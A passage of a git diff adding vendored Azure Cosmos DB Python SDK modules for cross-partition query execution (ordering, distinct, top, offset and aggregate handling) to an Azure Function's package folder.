IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for document producer implementation in the Azure Cosmos +database service. +""" + +import numbers +from collections import deque + +from azure.cosmos import _base +from azure.cosmos._execution_context.base_execution_context import _DefaultQueryExecutionContext + + +class _DocumentProducer(object): + """This class takes care of handling of the results for one single partition + key range. + + When handling an orderby query, MultiExecutionContextAggregator instantiates + one instance of this class per target partition key range and aggregates the + result of each. + """ + + def __init__(self, partition_key_target_range, client, collection_link, query, document_producer_comp, options): + """ + Constructor + """ + self._options = options + self._partition_key_target_range = partition_key_target_range + self._doc_producer_comp = document_producer_comp + self._client = client + self._buffer = deque() + + self._is_finished = False + self._has_started = False + self._cur_item = None + # initiate execution context + + path = _base.GetPathFromLink(collection_link, "docs") + collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return self._client.QueryFeed(path, collection_id, query, options, partition_key_target_range["id"]) + + self._ex_context = _DefaultQueryExecutionContext(client, self._options, fetch_fn) + + def __lt__(self, other): + return self._doc_producer_comp.compare(self, other) < 0 + + def __iter__(self): + return self + + def __next__(self): + """ + :return: The next result item. + :rtype: dict + :raises StopIteration: If there is no more result. + + """ + if self._cur_item is not None: + res = self._cur_item + self._cur_item = None + return res + + return next(self._ex_context) + + def get_target_range(self): + """Returns the target partition key range. + :return: + Target partition key range. + :rtype: dict + """ + return self._partition_key_target_range + + def peek(self): + """ + TODO: use more_itertools.peekable instead + :return: The current result item. + :rtype: dict. + :raises StopIteration: If there is no current item. + + """ + if self._cur_item is None: + self._cur_item = next(self._ex_context) + + return self._cur_item + + next = __next__ # Python 2 compatibility. + + +def _compare_helper(a, b): + if a is None and b is None: + return 0 + return (a > b) - (a < b) + + +class _PartitionKeyRangeDocumentProduerComparator(object): + """ + Provides a Comparator for document producers using the min value of the + corresponding target partition. + """ + + def __init__(self): + pass + + def compare(self, doc_producer1, doc_producer2): # pylint: disable=no-self-use + return _compare_helper( + doc_producer1.get_target_range()["minInclusive"], doc_producer2.get_target_range()["minInclusive"] + ) + + +class _OrderByHelper(object): + + @staticmethod + def getTypeOrd(orderby_item): + """Returns the ordinal of the value of the item pair in the dictionary. + + :param dict orderby_item: + + :return: + 0 if the item_pair doesn't have any 'item' key + 1 if the value is undefined + 2 if the value is a boolean + 4 if the value is a number + 5 if the value is a str or a unicode + :rtype: int + """ + if "item" not in orderby_item: + return 0 + val = orderby_item["item"] + if val is None: + return 1 + if isinstance(val, bool): + return 2 + if isinstance(val, numbers.Number): + return 4 + if isinstance(val, str): + return 5 + + raise TypeError("unknown type" + str(val)) + + @staticmethod + def getTypeStr(orderby_item): + """Returns the string representation of the type + + :param dict orderby_item: + :return: String representation of the type + :rtype: str + """ + if "item" not in orderby_item: + return "NoValue" + val = orderby_item["item"] + if val is None: + return "Null" + if isinstance(val, bool): + return "Boolean" + if isinstance(val, numbers.Number): + return "Number" + if isinstance(val, str): + return "String" + + raise TypeError("unknown type" + str(val)) + + @staticmethod + def compare(orderby_item1, orderby_item2): + """Compare two orderby item pairs. + + :param dict orderby_item1: + :param dict orderby_item2: + :return: + Integer comparison result. + The comparator acts such that + - if the types are different we get: + Undefined value < Null < booleans < Numbers < Strings + - if both arguments are of the same type: + it simply compares the values. + :rtype: int + """ + + type1_ord = _OrderByHelper.getTypeOrd(orderby_item1) + type2_ord = _OrderByHelper.getTypeOrd(orderby_item2) + + type_ord_diff = type1_ord - type2_ord + + if type_ord_diff: + return type_ord_diff + + # the same type, + if type1_ord == 0: + return 0 + + return _compare_helper(orderby_item1["item"], orderby_item2["item"]) + + +def _peek_order_by_items(peek_result): + return peek_result["orderByItems"] + + +class _OrderByDocumentProducerComparator(_PartitionKeyRangeDocumentProduerComparator): + """Provide a Comparator for document producers which respects orderby sort order. + """ + + def __init__(self, sort_order): # pylint: disable=super-init-not-called + """Instantiates this class + + :param list sort_order: + List of sort orders (i.e., Ascending, Descending) + + :ivar list sort_order: + List of sort orders (i.e., Ascending, Descending) + + """ + self._sort_order = sort_order + + def compare(self, doc_producer1, doc_producer2): + """Compares the given two instances of DocumentProducers. + + Based on the orderby query items and whether the sort order is Ascending + or Descending compares the peek result of the two DocumentProducers. + + If the peek results are equal based on the sort order, this comparator + compares the target partition key range of the two DocumentProducers. + + :param _DocumentProducer doc_producers1: first instance + :param _DocumentProducer doc_producers2: first instance + :return: + Integer value of compare result. + positive integer if doc_producers1 > doc_producers2 + negative integer if doc_producers1 < doc_producers2 + :rtype: int + """ + + res1 = _peek_order_by_items(doc_producer1.peek()) + res2 = _peek_order_by_items(doc_producer2.peek()) + + self._validate_orderby_items(res1, res2) + + for i, (elt1, elt2) in enumerate(zip(res1, res2)): + res = _OrderByHelper.compare(elt1, elt2) + if res != 0: + if self._sort_order[i] == "Ascending": + return res + if self._sort_order[i] == "Descending": + return -res + + return _PartitionKeyRangeDocumentProduerComparator.compare(self, doc_producer1, doc_producer2) + + def _validate_orderby_items(self, res1, res2): + if len(res1) != len(res2): + # error + raise ValueError("orderByItems cannot have different size") + + if len(res1) != len(self._sort_order): + # error + raise ValueError("orderByItems cannot have a different size than sort orders.") + + for elt1, elt2 in zip(res1, res2): + type1 = _OrderByHelper.getTypeStr(elt1) + type2 = _OrderByHelper.getTypeStr(elt2) + if type1 != type2: + raise ValueError("Expected {}, but got {}.".format(type1, type2)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/endpoint_component.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/endpoint_component.py new file mode 100644 index 0000000..720c68c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/endpoint_component.py @@ -0,0 +1,209 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution endpoint component implementation in the +Azure Cosmos database service. +""" +import numbers +import copy +import hashlib +import json + +from azure.cosmos._execution_context.aggregators import ( + _AverageAggregator, + _CountAggregator, + _MaxAggregator, + _MinAggregator, + _SumAggregator, +) + + +class _QueryExecutionEndpointComponent(object): + def __init__(self, execution_context): + self._execution_context = execution_context + + def __iter__(self): + return self + + def __next__(self): + # supports python 3 iterator + return next(self._execution_context) + + next = __next__ # Python 2 compatibility. + + +class _QueryExecutionOrderByEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling an order by query. + + For each processed orderby result it returns 'payload' item of the result. + """ + def __next__(self): + return next(self._execution_context)["payload"] + + next = __next__ # Python 2 compatibility. + + +class _QueryExecutionTopEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling top query. + + It only returns as many results as top arg specified. + """ + + def __init__(self, execution_context, top_count): + super(_QueryExecutionTopEndpointComponent, self).__init__(execution_context) + self._top_count = top_count + + def __next__(self): + if self._top_count > 0: + res = next(self._execution_context) + self._top_count -= 1 + return res + raise StopIteration + + next = __next__ # Python 2 compatibility. + + +class _QueryExecutionDistinctOrderedEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling distinct query. + + It returns only those values not already returned. + """ + def __init__(self, execution_context): + super(_QueryExecutionDistinctOrderedEndpointComponent, self).__init__(execution_context) + self.last_result = None + + def __next__(self): + res = next(self._execution_context) + while self.last_result == res: + res = next(self._execution_context) + self.last_result = res + return res + + next = __next__ # Python 2 compatibility. + + +class _QueryExecutionDistinctUnorderedEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling distinct query. + + It returns only those values not already returned. + """ + def __init__(self, execution_context): + super(_QueryExecutionDistinctUnorderedEndpointComponent, self).__init__(execution_context) + self.last_result = set() + + def make_hash(self, value): + if isinstance(value, (set, tuple, list)): + return tuple([self.make_hash(v) for v in value]) + if not isinstance(value, dict): + if isinstance(value, numbers.Number): + return float(value) + return value + new_value = copy.deepcopy(value) + for k, v in new_value.items(): + new_value[k] = self.make_hash(v) + + return tuple(frozenset(sorted(new_value.items()))) + + def __next__(self): + res = next(self._execution_context) + + json_repr = json.dumps(self.make_hash(res)) + json_repr = json_repr.encode("utf-8") + + hash_object = hashlib.sha1(json_repr) # nosec + hashed_result = hash_object.hexdigest() + + while hashed_result in self.last_result: + res = next(self._execution_context) + json_repr = json.dumps(self.make_hash(res)) + json_repr = json_repr.encode("utf-8") + + hash_object = hashlib.sha1(json_repr) # nosec + hashed_result = hash_object.hexdigest() + self.last_result.add(hashed_result) + return res + + next = __next__ # Python 2 compatibility. + + +class _QueryExecutionOffsetEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling offset query. + + It returns results offset by as many results as offset arg specified. + """ + def __init__(self, execution_context, offset_count): + super(_QueryExecutionOffsetEndpointComponent, self).__init__(execution_context) + self._offset_count = offset_count + + def __next__(self): + while self._offset_count > 0: + res = next(self._execution_context) + if res is not None: + self._offset_count -= 1 + else: + raise StopIteration + return next(self._execution_context) + + next = __next__ # Python 2 compatibility. + + +class _QueryExecutionAggregateEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling aggregate query. + + It returns only aggreated values. + """ + + def __init__(self, execution_context, aggregate_operators): + super(_QueryExecutionAggregateEndpointComponent, self).__init__(execution_context) + self._local_aggregators = [] + self._results = None + self._result_index = 0 + for operator in aggregate_operators: + if operator == "Average": + self._local_aggregators.append(_AverageAggregator()) + elif operator == "Count": + self._local_aggregators.append(_CountAggregator()) + elif operator == "Max": + self._local_aggregators.append(_MaxAggregator()) + elif operator == "Min": + self._local_aggregators.append(_MinAggregator()) + elif operator == "Sum": + self._local_aggregators.append(_SumAggregator()) + + def __next__(self): + for res in self._execution_context: + for item in res: + for operator in self._local_aggregators: + if isinstance(item, dict) and item: + operator.aggregate(item["item"]) + elif isinstance(item, numbers.Number): + operator.aggregate(item) + if self._results is None: + self._results = [] + for operator in self._local_aggregators: + self._results.append(operator.get_result()) + if self._result_index < len(self._results): + res = self._results[self._result_index] + self._result_index += 1 + return res + raise StopIteration + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/execution_dispatcher.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/execution_dispatcher.py new file mode 100644 index 0000000..bc1c9f5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/execution_dispatcher.py @@ -0,0 +1,208 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for proxy query execution context implementation in the Azure +Cosmos database service. +""" + +import json +from six.moves import xrange +from azure.cosmos.exceptions import CosmosHttpResponseError +from azure.cosmos._execution_context import multi_execution_aggregator +from azure.cosmos._execution_context.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context.base_execution_context import _DefaultQueryExecutionContext +from azure.cosmos._execution_context.query_execution_info import _PartitionedQueryExecutionInfo +from azure.cosmos._execution_context import endpoint_component +from azure.cosmos.documents import _DistinctType +from azure.cosmos.http_constants import StatusCodes, SubStatusCodes + +# pylint: disable=protected-access + + +def _is_partitioned_execution_info(e): + return ( + e.status_code == StatusCodes.BAD_REQUEST and e.sub_status == SubStatusCodes.CROSS_PARTITION_QUERY_NOT_SERVABLE + ) + + +def _get_partitioned_execution_info(e): + error_msg = json.loads(e.http_error_message) + return _PartitionedQueryExecutionInfo(json.loads(error_msg["additionalErrorInfo"])) + + +class _ProxyQueryExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + """Represents a proxy execution context wrapper. + + By default, uses _DefaultQueryExecutionContext. + + If backend responds a 400 error code with a Query Execution Info, switches + to _MultiExecutionContextAggregator + """ + + def __init__(self, client, resource_link, query, options, fetch_function): + """ + Constructor + """ + super(_ProxyQueryExecutionContext, self).__init__(client, options) + + self._execution_context = _DefaultQueryExecutionContext(client, options, fetch_function) + self._resource_link = resource_link + self._query = query + self._fetch_function = fetch_function + + def __next__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + + """ + try: + return next(self._execution_context) + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return next(self._execution_context) + + def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + try: + return self._execution_context.fetch_next_block() + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return self._execution_context.fetch_next_block() + + def _create_pipelined_execution_context(self, query_execution_info): + + assert self._resource_link, "code bug, resource_link is required." + if query_execution_info.has_aggregates() and not query_execution_info.has_select_value(): + if self._options and ("enableCrossPartitionQuery" in self._options + and self._options["enableCrossPartitionQuery"]): + raise CosmosHttpResponseError(StatusCodes.BAD_REQUEST, + "Cross partition query only supports 'VALUE ' for aggregates") + + execution_context_aggregator = multi_execution_aggregator._MultiExecutionContextAggregator(self._client, + self._resource_link, + self._query, + self._options, + query_execution_info) + return _PipelineExecutionContext(self._client, self._options, execution_context_aggregator, + query_execution_info) + + next = __next__ # Python 2 compatibility. + + +class _PipelineExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + + DEFAULT_PAGE_SIZE = 1000 + + def __init__(self, client, options, execution_context, query_execution_info): + super(_PipelineExecutionContext, self).__init__(client, options) + + if options.get("maxItemCount"): + self._page_size = options["maxItemCount"] + else: + self._page_size = _PipelineExecutionContext.DEFAULT_PAGE_SIZE + + self._execution_context = execution_context + + self._endpoint = endpoint_component._QueryExecutionEndpointComponent(execution_context) + + order_by = query_execution_info.get_order_by() + if order_by: + self._endpoint = endpoint_component._QueryExecutionOrderByEndpointComponent(self._endpoint) + + aggregates = query_execution_info.get_aggregates() + if aggregates: + self._endpoint = endpoint_component._QueryExecutionAggregateEndpointComponent(self._endpoint, aggregates) + + offset = query_execution_info.get_offset() + if offset is not None: + self._endpoint = endpoint_component._QueryExecutionOffsetEndpointComponent(self._endpoint, offset) + + top = query_execution_info.get_top() + if top is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, top) + + limit = query_execution_info.get_limit() + if limit is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, limit) + + distinct_type = query_execution_info.get_distinct_type() + if distinct_type != _DistinctType.NoneType: + if distinct_type == _DistinctType.Ordered: + self._endpoint = endpoint_component._QueryExecutionDistinctOrderedEndpointComponent(self._endpoint) + else: + self._endpoint = endpoint_component._QueryExecutionDistinctUnorderedEndpointComponent(self._endpoint) + + def __next__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + return next(self._endpoint) + + def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + This method internally invokes next() as many times required to collect + the requested fetch size. + + :return: List of results. + :rtype: list + """ + + results = [] + for _ in xrange(self._page_size): + try: + results.append(next(self)) + except StopIteration: + # no more results + break + return results + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/multi_execution_aggregator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/multi_execution_aggregator.py new file mode 100644 index 0000000..632f715 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/multi_execution_aggregator.py @@ -0,0 +1,198 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for multi execution context aggregator implementation in the Azure Cosmos database service. +""" + +import heapq +from azure.cosmos._execution_context.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context import document_producer +from azure.cosmos._routing import routing_range +from azure.cosmos import exceptions + +# pylint: disable=protected-access + + +class _MultiExecutionContextAggregator(_QueryExecutionContextBase): + """This class is capable of queries which requires rewriting based on + backend's returned query execution info. + + This class maintains the execution context for each partition key range + and aggregates the corresponding results from each execution context. + + When handling an orderby query, _MultiExecutionContextAggregator + instantiates one instance of DocumentProducer per target partition key range + and aggregates the result of each. + """ + + # TODO improvement: this class needs to be parallelized + + class PriorityQueue: + """Provides a Priority Queue abstraction data structure""" + + def __init__(self): + self._heap = [] + + def pop(self): + return heapq.heappop(self._heap) + + def push(self, item): + heapq.heappush(self._heap, item) + + def peek(self): + return self._heap[0] + + def size(self): + return len(self._heap) + + def __init__(self, client, resource_link, query, options, partitioned_query_ex_info): + super(_MultiExecutionContextAggregator, self).__init__(client, options) + + # use the routing provider in the client + self._routing_provider = client._routing_map_provider + self._client = client + self._resource_link = resource_link + self._query = query + self._partitioned_query_ex_info = partitioned_query_ex_info + self._sort_orders = partitioned_query_ex_info.get_order_by() + + if self._sort_orders: + self._document_producer_comparator = document_producer._OrderByDocumentProducerComparator(self._sort_orders) + else: + self._document_producer_comparator = document_producer._PartitionKeyRangeDocumentProduerComparator() + + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + self._orderByPQ = _MultiExecutionContextAggregator.PriorityQueue() + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + + self._orderByPQ.push(targetQueryExContext) + + except exceptions.CosmosHttpResponseError as e: + if exceptions._partition_range_is_gone(e): + # repairing document producer context on partition split + self._repair_document_producer() + else: + raise + + except StopIteration: + continue + + def __next__(self): + """Returns the next result + + :return: The next result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + if self._orderByPQ.size() > 0: + + targetRangeExContext = self._orderByPQ.pop() + res = next(targetRangeExContext) + + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + targetRangeExContext.peek() + self._orderByPQ.push(targetRangeExContext) + + except StopIteration: + pass + + return res + raise StopIteration + + def fetch_next_block(self): + + raise NotImplementedError("You should use pipeline's fetch_next_block.") + + def _repair_document_producer(self): + """Repairs the document producer context by using the re-initialized routing map provider in the client, + which loads in a refreshed partition key range cache to re-create the partition key ranges. + After loading this new cache, the document producers get re-created with the new valid ranges. + """ + # refresh the routing provider to get the newly initialized one post-refresh + self._routing_provider = self._client._routing_map_provider + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + self._orderByPQ = _MultiExecutionContextAggregator.PriorityQueue() + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + + self._orderByPQ.push(targetQueryExContext) + + except StopIteration: + continue + + def _createTargetPartitionQueryExecutionContext(self, partition_key_target_range): + + rewritten_query = self._partitioned_query_ex_info.get_rewritten_query() + if rewritten_query: + if isinstance(self._query, dict): + # this is a parameterized query, collect all the parameters + query = dict(self._query) + query["query"] = rewritten_query + else: + query = rewritten_query + else: + query = self._query + + return document_producer._DocumentProducer( + partition_key_target_range, + self._client, + self._resource_link, + query, + self._document_producer_comparator, + self._options, + ) + + def _get_target_partition_key_range(self): + + query_ranges = self._partitioned_query_ex_info.get_query_ranges() + return self._routing_provider.get_overlapping_ranges( + self._resource_link, [routing_range.Range.ParseFromDict(range_as_dict) for range_as_dict in query_ranges] + ) + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/query_execution_info.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/query_execution_info.py new file mode 100644 index 0000000..e9f3e7d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/query_execution_info.py @@ -0,0 +1,130 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for partitioned query execution info implementation in the Azure Cosmos database service. +""" + +from azure.cosmos.documents import _DistinctType + + +class _PartitionedQueryExecutionInfo(object): + """Represents a wrapper helper for partitioned query execution info + dictionary returned by the backend. + """ + + QueryInfoPath = "queryInfo" + HasSelectValue = [QueryInfoPath, "hasSelectValue"] + TopPath = [QueryInfoPath, "top"] + OffsetPath = [QueryInfoPath, "offset"] + LimitPath = [QueryInfoPath, "limit"] + DistinctTypePath = [QueryInfoPath, "distinctType"] + OrderByPath = [QueryInfoPath, "orderBy"] + AggregatesPath = [QueryInfoPath, "aggregates"] + QueryRangesPath = "queryRanges" + RewrittenQueryPath = [QueryInfoPath, "rewrittenQuery"] + + def __init__(self, query_execution_info): + """ + :param dict query_execution_info: + """ + self._query_execution_info = query_execution_info + + def get_top(self): + """Returns the top count (if any) or None. + """ + return self._extract(_PartitionedQueryExecutionInfo.TopPath) + + def get_limit(self): + """Returns the limit count (if any) or None. + """ + return self._extract(_PartitionedQueryExecutionInfo.LimitPath) + + def get_offset(self): + """Returns the offset count (if any) or None. + """ + return self._extract(_PartitionedQueryExecutionInfo.OffsetPath) + + def get_distinct_type(self): + """Returns the offset count (if any) or None. + """ + return self._extract(_PartitionedQueryExecutionInfo.DistinctTypePath) + + def get_order_by(self): + """Returns order by items (if any) or None. + """ + return self._extract(_PartitionedQueryExecutionInfo.OrderByPath) + + def get_aggregates(self): + """Returns aggregators (if any) or None. + """ + return self._extract(_PartitionedQueryExecutionInfo.AggregatesPath) + + def get_query_ranges(self): + """Returns query partition ranges (if any) or None. + """ + return self._extract(_PartitionedQueryExecutionInfo.QueryRangesPath) + + def get_rewritten_query(self): + """Returns rewritten query or None (if any). + """ + rewrittenQuery = self._extract(_PartitionedQueryExecutionInfo.RewrittenQueryPath) + if rewrittenQuery is not None: + # Hardcode formattable filter to true for now + rewrittenQuery = rewrittenQuery.replace("{documentdb-formattableorderbyquery-filter}", "true") + return rewrittenQuery + + def has_select_value(self): + return self._extract(self.HasSelectValue) + + def has_top(self): + return self.get_top() is not None + + def has_limit(self): + return self.get_limit() is not None + + def has_offset(self): + return self.get_offset() is not None + + def has_distinct_type(self): + return self.get_distinct_type() != _DistinctType.NoneType + + def has_order_by(self): + order_by = self.get_order_by() + return order_by is not None and len(order_by) > 0 + + def has_aggregates(self): + aggregates = self.get_aggregates() + return aggregates is not None and len(aggregates) > 0 + + def has_rewritten_query(self): + return self.get_rewritten_query() is not None + + def _extract(self, path): + + item = self._query_execution_info + if isinstance(path, str): + return item.get(path) + + for p in path: + item = item.get(p) + if item is None: + return None + return item diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_global_endpoint_manager.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_global_endpoint_manager.py new file mode 100644 index 0000000..7e35648 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_global_endpoint_manager.py @@ -0,0 +1,174 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for global endpoint manager implementation in the Azure Cosmos +database service. +""" + +import threading + +from six.moves.urllib.parse import urlparse + +from . import _constants as constants +from . import exceptions +from ._location_cache import LocationCache + +# pylint: disable=protected-access + + +class _GlobalEndpointManager(object): + """ + This internal class implements the logic for endpoint management for + geo-replicated database accounts. + """ + + def __init__(self, client): + self.Client = client + self.EnableEndpointDiscovery = client.connection_policy.EnableEndpointDiscovery + self.PreferredLocations = client.connection_policy.PreferredLocations + self.DefaultEndpoint = client.url_connection + self.refresh_time_interval_in_ms = self.get_refresh_time_interval_in_ms_stub() + self.location_cache = LocationCache( + self.PreferredLocations, + self.DefaultEndpoint, + self.EnableEndpointDiscovery, + client.connection_policy.UseMultipleWriteLocations, + 